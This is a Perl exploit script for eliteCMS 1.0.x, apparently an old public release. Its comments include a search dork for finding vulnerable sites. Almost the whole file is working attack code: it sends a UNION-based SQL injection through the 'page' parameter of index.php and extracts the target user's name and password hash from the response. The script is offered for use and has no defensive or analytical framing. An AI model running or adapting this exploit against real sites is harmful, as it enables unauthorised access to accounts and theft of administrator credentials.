#!/usr/bin/perl
system('cls');
 
#*************************************************  ****************************
#*************************************************  ****************************
#**     Written by Dimi4,                                                   **
#**     Greetings to antichat && elwaux                                     **
#**     dork:""Powored by Elite CMS"                                        **
#**     version:1.0.x                                                       **
#**     magic_qotes_gpc=OFF                                                 **
#**                                                                         **
#*************************************************  **************************** 
# **************************************************  **************************
 
use IO::Socket;
 
print "\n +-------------------------------------------------------------+\n";
print " |           eliteCMS 1.0.x Sql-Injection Exploit              |\n";
print " |           By Dimi4                                          |\n";
print " +-------------------------------------------------------------+\n\n";
 
if (@ARGV < 3)
{
print " [i] usage:\r\n";
print "     eliteCMS.pl Server Dir Username\r\n\r\n";
print "     SERVER         - Server where eliteCMS was installed.\r\n";
print "     DIR            - eliteCMS directory or / for parent.\r\n";
print "     Username       - Targer username(default - admin).\r\n";
print "\n [i] Example:\r\n";
print "     eliteCMS.pl 192.168.168.1 / admin2\n";
<stdin>;
exit();
}
 
$serv           = $ARGV[0];
$dir            = $ARGV[1];
$username       = $ARGV[2];
 
 
$serv           =~ s/http:\/\///ge;
$delimit        = "0x336c317433636d353378706c303174";

$sploit = 'http://'.$serv.'/'.
        'index.php?page=1\'+union+select+1,concat'.
        '(user_name,\''.$delimit.'\',h_password)'.
        ',3,4,5,6,7,8,9,10,11+from+users+where+user_name=\''.$username.'\'+'.
        'limit+1,1%23';
 
 
$sock = IO::Socket::INET->new(
                Proto=>"tcp",
                PeerAddr=>"$serv",
                PeerPort=>"80") or die " [-] could not connect to host.\n";
 
print " [+] connecting OK\n";
 
print " [+] sending exploit..\n";
 
print $sock "GET $sploit HTTP/1.1\n";
print $sock "Host: $serv\n\n";
read($sock,my $answer,1000);
$success = 0;
print " [+] In progress...\n";

if ($answer=~ /$delimit/) {
        $answer =~ /$username$delimit(.*)::-::<\/title>/;
		print " [+] Exploit succeeded...\n";
		print ' [+] Targer:  '.$serv."\n";
        print ' [+] Username:   '.$username."\n";
        print ' [+] Password: '.$1."\n";
        exit();
        } else
        { print " [-] FAILED!\n"; exit(); }
 
 
 
close($sock);


<stdin>;
exit();